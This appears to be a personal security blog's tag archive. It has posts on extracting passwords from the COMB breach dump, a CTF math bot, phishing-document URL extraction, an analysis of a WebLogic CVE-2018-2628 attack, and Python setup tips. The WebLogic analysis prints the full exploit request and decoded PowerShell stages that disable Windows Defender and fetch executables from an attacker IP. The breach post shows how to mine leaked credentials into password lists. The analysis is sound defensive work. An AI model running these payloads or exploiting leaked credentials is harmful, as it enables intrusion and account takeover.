Tag Archives: python

Extracting password from data leaks dump files

Recently I’ve read about this data leak; COMB: largest breach of all time leaked online with 3.2 billion records.

According to the article, it was known as “Compilation of Many Breaches” (COMB). This data was leaked on a popular hacking forum. It contains billions of user credentials from past leaks from Netflix, LinkedIn, Exploit.in, Bitcoin and more. This leak contains email and password pairs.

Inside the data dump, it was structured something like this:

CompilationOfManyBreaches
  folderdata
    folder1
       file0
       file1
    folder2
       file0
       file1

The file contains something like this:

Which indicated as email:password

So I’m wondered… What if we extract either email or password only from all those files? We can maybe create a password list from that. Or we can analyze the password trend. See what’s the top password being used & stuff.

So… We’re not going thru all hundreds of files which total up 100GB+ to extract the password manually… That’s crazy ma man!

To make it easier, I’ve created a Python script to extract the password from all dump file recursively. The code as below:

#!/usr/bin/env python
import os
from timeit import default_timer as timer
from datetime import timedelta

inputfile = "/Desktop/test/data" #change this to your dump files locations

outputfile = open("extracted_password.txt", "w")

print("\nStart extracting...")
start = timer()

for path, dirs, files in os.walk(inputfile):
    for filename in files:
        fullpath = os.path.join(path, filename)
        with open(fullpath, "r") as f:
            #print(f.read())
            for line in f:
                email, password, *rest = line.split(":")
                outputfile.write("%s" % password)
                #print(password, end='')

outputfile.close()

print("Finish!\n")
end = timer()
print("Time Taken: ", end='')
print(timedelta(seconds=end-start))

Save the code above & run the script:

$ python password_extractor.py

It may takes some times depending on your hardware resources and dump file size. You should see output something like this after the script completed execution:

When completed, you should see a new file named “extracted_password.txt” being created. Inside it contains all the password from all dump file; consolidated into 1 single big ass file.

Now we can start analyzing the password pattern. We can use this command below to see what’s the top 10 password:

$ time sort extracted_password.txt | uniq -c | sort -bgr | head -10

Happy hunting & analyzing! 🙂

Global Community CTF: Mini Bootup by SANS – NM02

Question:

This server is trying to get us to run some calculations but it's just too fast for us. Can you work out a way to solve this?

Domain: cgames-nm02.allyourbases.co Port: 9010

Let’s try connect to the domain & port given via netcat

Hmm. There’s mathematic question that we need to solve. But we’re too slow on solving it..

What if we create a bot to solve those question?

import pwn
import re

host, port = 'cgames-nm02.allyourbases.co', 9010
session = pwn.remote(host, port)

while True:
	try:
		what = session.recv(1024)
		questionrm = (what.replace('=','')) #remove =
		print "Q: " + questionrm
		
		math = eval(questionrm)
		math_str = str(math)
		print "AS: " + math_str
		
		print session.sendline(math_str)
		print session.recvline()
	except EOFError:
		print('Done!')
		break
    
session.close()

Save it & run. Watch the magic happen…

The flag is: SuperServer1337

Analyzing Phishing Email – Word XML File Analysis

Recently I’ve observed a phishing mail as below:
https://www.virustotal.com/#/file/cf027dd938f1a268f45f2ea786dc538ab47f35006fb12d0b64e0867bccf789c0/detection – clean

The file seems to be clean per VT. Interestingly, on details sections, found 2 URLs under OpenXML Doc Info; section Package Relationships:

To search for these URLs, first you’ll need to rename the Word doc file to compressed zip file. E.g. sample.doc to sample.zip.

Then, extract the zip file. The URLs can be found inside file document.xml.rels (~/sample_folder/word/_rels/):

Its may look simple if you know which & where the file to be look at.

I’m thinking; what if we can search for all the URL/hyperlink in the XML files content of the Word document, without actually having to open it one-by-one.

To do that, we’ll using zipdump, re-search (together with reextra) Python script tools by Didier Stevens:

Download the Python scripts mentioned above and put it into one place. Then, executed this command below:

./zipdump.py -D sample.zip | ./re-search.py -f -n url -u

Command above will search the content of the zip file & extract/applied regex searching for URLs.

As you can see below, these is all the URLs that contained in the Word doc:

Analyzing Oracle WebLogic attack

Recently we received an alert from our WAF related to an attack towards our environment.

Further review of the alert found that the attacker is using Oracle WebLogic RCE Deserialization Vulnerability (CVE-2018-2628).

We observed that the attacker included some sort of PowerShell command in their request:

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
  <array class="java.lang.String" length="3">
    <void index="0">
      <string>cmd.exe</string>
    </void>
    <void index="1">
      <string>/c</string>
    </void>
    <void index="2">
      <string>Start /Min PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAVwBtAGkAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMAWwAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwBdAD0AIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACsAIAAkAE8AUwAiADsASQBFAFgAIAAkAFcAQwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADEAMQAuADIAMwAwAC4AMgAyADkALgAyADIANgAvAGkAbQBhAGcAZQBzAC8AdABlAHMAdAAvAEQATAAuAHAAaABwACcAKQA7AA==</string>
    </void>
  </array>
    <void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>

Seems like the PowerShell command is using Base64 encoding for obfuscation. I use CyberChef to decode the base64. Result we get after decoding it:

$OS=(GWmi Win32_OperatingSystem).Caption;$WC=New-Object Net.WebClient;$WC.Headers['User-Agent']="PowerShell/WL+ $OS";IEX $WC.DownloadString('http://111.230.229.226/images/test/DL.php');

Seems like it tried to fetch file DL.php at http://111.230.229.226/images/test/DL.php. Lets try grab that file:

[email protected]:~# wget http://111.230.229.226/images/test/DL.php
--2018-04-29 19:50:27--  http://111.230.229.226/images/test/DL.php
Connecting to 111.230.229.226:80... connected.
HTTP request sent, awaiting response... 404 Not Found
2018-04-29 19:50:28 ERROR 404: Not Found.

Hmm.. Error 404..? Is it true error? Or did we missing something here?

Lets analyze the command carefully:

PS C:\Users\Fossil\Desktop> $OS=(GWmi Win32_OperatingSystem).Caption;
PS C:\Users\Fossil\Desktop> $WC=New-Object Net.WebClient;
PS C:\Users\Fossil\Desktop> $WC.Headers['User-Agent']="PowerShell/WL+ $OS";
PS C:\Users\Fossil\Desktop>
PS C:\Users\Fossil\Desktop> echo $OS;
Microsoft Windows 7 Ultimate
PS C:\Users\Fossil\Desktop> echo $WC.Headers['User-Agent'];
PowerShell/WL+ Microsoft Windows 7 Ultimate

We can see the attacker is assigning/using specific User-Agent when fetching the file. That’s why when we try to wget/curl the file directly, it failed.

So what we need to do is set the User-Agent exactly the same as above when fetching the file. In this case, I’m using curl to fetch the file:

[email protected]:~# curl -v -H User-Agent: "PowerShell/WL Microsoft Windows 7 Professional" http://111.230.229.226/images/test/DL.php
*   Trying 111.230.229.226...
* Connected to 111.230.229.226 (111.230.229.226) port 80 (#0)
> GET /images/test/DL.php HTTP/1.1
> Host: 111.230.229.226
> Accept: */*
> User-Agent: PowerShell/WL Microsoft Windows 7 Professional
<
< HTTP/1.1 200 OK
< Date: Sun, 29 Apr 2018 11:50:23 GMT
< Server: Apache/2.2.21 (Win32) PHP/5.3.10
< X-Powered-By: PHP/5.3.10
< Content-Length: 2539
< Content-Type: text/html
<
$EncodedCompressedFile = '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';$DeflatedStream = New-Object IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String($EncodedCompressedFile),[IO.Compression.CompressionMode]::Decompress);$UncompressedFileBytes = New-Object Byte[](3948);$Null=$DeflatedStream.Read($UncompressedFileBytes, 0, 3948);([Text.Encoding]::ASCII.GetString($UncompressedFileBytes)) | IEX;

Ah.. Now see young padawan? Previously if the file been fetch without the User-Agent, it will failed/throw error 404. Again, we see another set of base64 encoding here.

But what is it?

I’m not an expert to explain this, but TL;DR, it convert the base64 encoded string to a memory stream and executes it. I guess ¯_(ツ)_/¯

So, to see what happen if this command executes, we can use this Python script below to decode it. With this script, we can basically see what are those base64 are doing.

We’ll create a Python script named “decodeb64.py“. Copy the base64 we found above, paste it after the encoded parameters; as example below:

#!/usr/bin/python
import base64
import zlib

encoded = "7b0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ/ff/z9cZmQBbPbOStrJniGAqsgfP358Hz8ifrcv1m3+7kW2yNPP0o8/L6tJVv6+ezu7Bzv7uw8//o2T321yUudZm8/o69/tWZk1OX0255fokxf51faXk5/Op236+rpp88X4zZyaz4rlxZjbbP1ubb3OR66X0fde5efft1Dv/MZJcZ5u+X//4t84+bHXbVa326/LPF+lhAp9on2OX+VlTkgIcGr9S37jJC+BFF47fVe0/BH++/GvVjMCSeh+d1GYAdZV1f6+02JxuffoZXWV16/neVn+/ifVYpEtZxju4uXZ7LPf7cW6LA/5d3pp63sE4ISG3nw/NbDujF/W1Sqv2yJvvvcxGn78/fFPZuU61wHxu9vLPGVYd9JfnBJ+362LNt/+dtW06UffK76fflnOUmr3KOXmH1GLz/N2myBP86ZJtwmCwjmt66o+nrZFtUxfF2W+bMvrk2rZFst1nv5M+rqtVu61Z1U9zZkMvZHP8vNsXbY/H8aO/3631/Wljv+jn5qvn1bLi2fZ8uL3WX80Sj96UTT09Uejj75ovli9vpzSb9+d4UP5tVg+zc/z5QxNv3hy/MXrvL4spjl9le0dU+9fZOVVVueE+HlFvDud08AJXlosU9OtMPOP/9hrGpi+nm4zPtxym7l8vXpzvcrTp0WTTcr8hvEyNAw4Bo7HftP7P8ZzQgR5fTLO3+UpfXNeXAgExuczi0q/MbrmpsJdRPVB6oKop8sLkHd1spi9Wi/p10XT5DRP9Jsj/uvj1yfrAq8sJtmirbNrNKRfG4/g5nef2NQ7E1uxUM0RMJEQBw2/PhcZErzKL5gGx7NZ+tG3f6/nX/y+r6vz9rvEAr/vF8W0rhr66/clrplVV00qrJPXv+/r1fWLvP0ovXuZfiS/v8pXFYkOkSa926avTj///Z9+98tXT9O7s3QnvXv+oR2evpuW64ZG2fy+L7N23kjXv9vp8vIRWLqoP6Dbl1VZTEnoN/Qv3SkHQUxo0CwmvV53B3uVTtmc/L4n67qmucJM1VVJgvT7Kuc3v6+wEPpjvu11sP+hHahe+Fnsweibn80ujB67qQ/Rl9O6WLUQaN8Cb0GoXpGRqBbp9hckc5/u0M/sXXpvZ+fO4dnp751ueY4A8fj4u/nkpCwIpTvjp9XVsqyy2eu2Jqbf+njetqtHd+/u7u6O9+7tjPf2HtL/P71bLLKLvLlLBuru0+fjVbP78Z3Djw4tSk+u27whvL5n3Iz8XTs+XU4ruBrff/Toq2VBv+djwpSbbul7dwCC2+UzOzgDhOh1SWaMXn9TPSGn4tN9RdLvFBCg60iYQBeWJHn/FSyq/Hpvz0iCs6y/7+XueOf3dX9j5kiB/W7H9cUlIG2/qF6SiqqWZ6SdXqZPrl9m0D3fTb9dzGb5kj5MQ8zxslFRn8lceiqLdBrjKJhuUy/rBU3A84IMrvS5LSi+bq/L3HaCTslnWzvYbPd/ty3z5/jMOmmugTPuonUD4/7J94kH1qBklb58nRoU6bWiSR2QjzrOWwBjexOMF189f/6RNfI/bjgsr2kQ7w4+BXE3cxlNa3uXWpopeffp/m1f+nTfvASKW44Q3fr7vskXq9+3bIim4/z35lbfPYm6yYGQqPARgBg8SAHI/7tuvSEMtmWS6cs7d34xAz4jePxBuq2eRE0dVfX1YfpLzJsswdKQ0RYLdyfdJmp+7+zLMT48W55X378Db+1Vvqgu8377G6yocbq+fA3HET2Sw6jDpvHc24OvuSLHvRYi3BnLT2ANQf9y6LUvydnMYDLNe1++Pq6nc2KXabuu1evcQr+klVpyDj7+dP9jGtyXNXyyL4NPYwwLb/R1+un+9qSAkP0YTZpVWxj+FhhkJKSg93+Mu/Mmgz9Pt/NfRL9mxM9og076gG7JYr//T37xktnM6/SXDIvLxzqCe3sYwcfxERx8+sMbwcGnwyOQ2er2HRkTqREr2TMelFpBkp3X306fEZtfZfQBjOFxWZKenZGauKgzw7QfqUpOJRD8KD1dwishSDBZ/shuZ5t4bN/94kys06bpIO31LCvK9E1lh0AD+CX/Dw=="

# [Convert]::FromBase64String
decoded = base64.b64decode(encoded)

# IO.Compression.DeflateStream
# 15 is the default parameter, negative makes it ignore the gzip header
decompressed = zlib.decompress(decoded, -15)

print decompressed

Save the script and run the Python script as below:

C:\Users\Fossil\Desktop>python decodeb64.py > output_DL_php.txt

This will save all the output from your CMD to text file for easier to ready.
P/S : Your can rename output_DL_php.txt to any filename that you want.

Let’s see whats inside the text file:

$MutexName = 'Global\20180419'
$bCreated = $Flase
$hMutex = New-Object System.Threading.Mutex($true,$MutexName,[Ref]$bCreated)
if ($bCreated)
{
        Start-Sleep 180
        $hMutex.ReleaseMutex()
}
else
{
        Exit
}


#Update
$WmiName = 'root\cimv2:PowerShell_Command'
$mPId=$Null;$mPId = ([WmiClass] $WmiName).Properties['mPId'].Value
if ($mPId -ne $Null) {
        Write-Host "[i] Old PId: $mPId"
        Get-Process -Id $mPId -ErrorAction SilentlyContinue | Stop-Process -Force
}
$WmiName = 'root\default:PowerShell_Command'
$mPId=$Null;$mPId = ([WmiClass] $WmiName).Properties['mPId'].Value
if ($mPId -ne $Null) {
        Write-Host "[i] Old PId: $mPId"
        Get-Process -Id $mPId -ErrorAction SilentlyContinue | Stop-Process -Force
}


$SrvName = "ZhuDongFangYu", "NisSrv","MsMpSvc","WdNisSvc","WinDefend", "MBAMService","a2AntiMalware"
foreach ($Srv in $SrvName)
{
#       Set-Service -Name $Srv -StartupType Disabled -ErrorAction SilentlyContinue
#       Stop-Service -Name $Srv -Force -ErrorAction SilentlyContinue
        $Null = SC.exe Config $Srv Start= Disabled
        $Null = SC.exe Stop $Srv
}
$ProName = "ZhuDongFangYu", "MsMpEng","MpCmdRun","msseces","NisSrv","MSASCui", "mbamtray","mbamservice","a2service"
foreach ($Pro in $ProName)
{
        Get-Process -Name $Pro -ErrorAction SilentlyContinue | Stop-Process -Force
}

$Null = Reg.exe Add "HKLM\SoftWare\Microsoft\Windows Defender\SpyNet" /v "SpyNetReporting" /t REG_DWORD /d 0 /f
$Null = Reg.exe Add "HKLM\SoftWare\Microsoft\Windows Defender\Exclusions\Paths" /v "$Env:WinDir" /t REG_DWORD /d 0 /f
$Null = Reg.exe Add "HKLM\SoftWare\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
$Null = Reg.exe Add HKLM\System\CurrentControlSet\Services\NisSrv /v Start /t REG_DWORD /d 4 /f
$Null = Reg.exe Add HKLM\System\CurrentControlSet\Services\MsMpSvc /v Start /t REG_DWORD /d 4 /f
$Null = Reg.exe Add HKLM\System\CurrentControlSet\Services\WdNisSvc /v Start /t REG_DWORD /d 4 /f
$Null = Reg.exe Add HKLM\System\CurrentControlSet\Services\WinDefend /v Start /t REG_DWORD /d 4 /f


$Script = "Start-Sleep (Get-Random -Min 60 -Max 300);IEX (New-Object Net.WebClient).DownloadString('http://111.230.229.226/images/def/DL.ps1');";
$ScriptBytes = [System.Text.Encoding]::Unicode.GetBytes($Script);
$EncodedScript = [System.Convert]::ToBase64String($ScriptBytes);

$Path = "$Env:SystemRoot\System32\WindowsPowerShell\v1.0\PowerShell.exe"
$Argv = "-NoP -NonI -EP ByPass -W Hidden -E $EncodedScript"
$Process = Start-Process -FilePath $Path -ArgumentList $Argv -WindowStyle Hidden -PassThru
$ProcessId = $($Process.Id)
if ($ProcessId -ne $Null)
{
        Write-Host "[+] Neutrino PS Process Id is $ProcessId"
}
else
{
        Write-Host "[-] Neutrino PS Process Id is NULL"
}


#Downloader
$x86 = "http://111.230.229.226/images/test/x86.exe"
$x64 = "http://111.230.229.226/images/test/x64.exe"
$File = "$Env:WinDir\Temp\lsass.eXe"
$WC = New-Object System.Net.WebClient


$Dir = "$Env:WinDir\Temp";
if (!(Test-Path $Dir)){ New-Item $Dir -Type Directory; }
if (!((Get-Item $File -Force) -is [IO.FileInfo])) { Remove-Item $File -Force -ErrorAction SilentlyContinue }


$OS = (Get-WmiObject Win32_ComputerSystem).SystemType
$SO = (Get-WmiObject Win32_OperatingSystem).OSArchitecture
if (($OS -Match '64') -Or ($SO -Match '64'))
{
        Write-Host "[i] OS 64-bit"
        $WC.DownloadFile($x64, $File)
        if ((Test-Path $File) -eq $False)
        {
                $WC.DownloadFile("http://111.230.229.226/images/test/x64_VMP.exe", $File)
        }
}
else
{
        Write-Host '[i] OS 32-bit'
        $WC.DownloadFile($x86, $File)
        if ((Test-Path $File) -eq $False)
        {
                $WC.DownloadFile("http://111.230.229.226/images/test/x86_VMP.exe", $File)
        }
}

if (Test-Path $File)
{
        Write-Host '[+] Downloaded'
        $Null = NetSH Firewall Add AllowedProgram $File "Windows Update" Enable
        IEX $WC.DownloadString('http://111.230.229.226/images/test/WMI.ps1')
}
else
{
        Write-Host '[-] Fail To Download'
}

As you can see, the command is doing bunch of stuff that I’m lazy to explain 😉
Hope you enjoy reading this.

Here’s some of IOCs that I managed to gather:

017eba5231a63782bdd1d7c8beff5b0b *DL.php
bee2f2223729166c264037a82fa4fed3 *DL.ps1
b5065178c574936a1b7e477929ba1075 *lsass.eXe
1dd6bc7549913b64595540bc77059415 *Neutrino.ps1
dfcb19949d55d35e5d3f1dd569218ce4 *WMI.ps1
ec5e6097038be59e7311f9de8d6354d6 *x64.exe
35cb2b208085bcb5b93ea6420f01c92b *x64_VMP.exe
2129a8287215558e5870c7cc89d0a8fe *x86.exe
c11dbd4777d6ec2b434c424e201c0e6b *x86_VMP.exe

References:
https://gist.githubusercontent.com/strazzere/5faa709a3db9e1dcf3b5/raw/42b98a918bac3725934bcfa3087ac5936d9b88d1/decrypt.py
http://threat.tevora.com/5-minute-forensics-decoding-powershell-payloads/

Upgrade Python packages at using pip

As you read in the title above; to update your Python packages via pip.

for Linux/*nix:

pip freeze --local | grep -v '^\-e' | cut -d = -f 1  | xargs -n1 pip install -U

p/s: you may need to run as sudo. Probably.

for Windows:

for /F "delims===" %i in ('pip freeze -l') do pip install -U %i

Credit:

http://stackoverflow.com/questions/2720014/upgrading-all-packages-with-pip

Python Error – InsecurePlatformWarning

There is one time I see this kind of error:

          InsecurePlatformWarning: A true SSLContext object is not available. 
This prevents urllib3 from configuring SSL appropriately and may cause certain SSL connections to fail.
For more information, see https://urllib3.readthedocs.org/en/latest/security.html#insecureplatformwarning.
InsecurePlatformWarning

If you’re on Ubuntu, you may run into trouble installing pyopenssl, so you’ll need these dependencies:

apt-get install libffi-dev libssl-dev

Then you’ll only need to install the security package extras:

pip install requests[security]

or, install them directly via pip:

pip install pyopenssl ndg-httpsclient pyasn1

Requests package/library will then automatically inject pyopenssl into urllib3

Credit:
http://stackoverflow.com/questions/29134512/insecureplatformwarning-a-true-sslcontext-object-is-not-available-this-prevent

Python Error – ImportError: No module named pkg_resources

There is one time I tried to install some python package via pip install requirement. But I encountered some error like this:

    from pkg_resources import load_entry_point
ImportError: No module named pkg_resources

To fix the issue, run the setup script for setuptools:

wget https://bitbucket.org/pypa/setuptools/raw/bootstrap/ez_setup.py -O - | python

Yeah. it solve my problem. Probably. XD

Credit:
http://stackoverflow.com/questions/7446187/no-module-named-pkg-resources

Maltrieve on Mac OS X

Maltrieve originated as a fork of mwcrawler. It retrieves malware directly from the sources as listed at a number of sites, including:

  • Malc0de
  • Malware Black List
  • Malware Domain List
  • VX Vault
  • URLqery
  • CleanMX

If you want to install maltrieve on your Mac OS X, below is the steps to install it.

  • First, install beautifulsoup4 via pip
sudo pip install beautifulsoup4
  • Install required dependencies via apt-get
sudo port install libxml2 libxslt py-lxml
  • Download maltrieve from github
sudo git clone https://github.com/technoskald/maltrieve.git
cd maltrieve
python maltrieve.py -d pull -l maltrieve.log

Done. Now you can use the Maltrieve on your Mac OS X.

Install pip on Ubuntu 12.04

Install pip and virtualenv for Ubuntu 10.10 Maverick and newer

sudo apt-get install python-pip python-dev build-essential
sudo pip install –upgrade pip
sudo pip install –upgrade virtualenv

For older versions of Ubuntu
Install Easy Install

sudo apt-get install python-setuptools python-dev build-essential

Install pip

sudo easy_install pip

Install virtualenv

sudo pip install –upgrade virtualenv

 I advice you to reboot your server first after installing python-pip package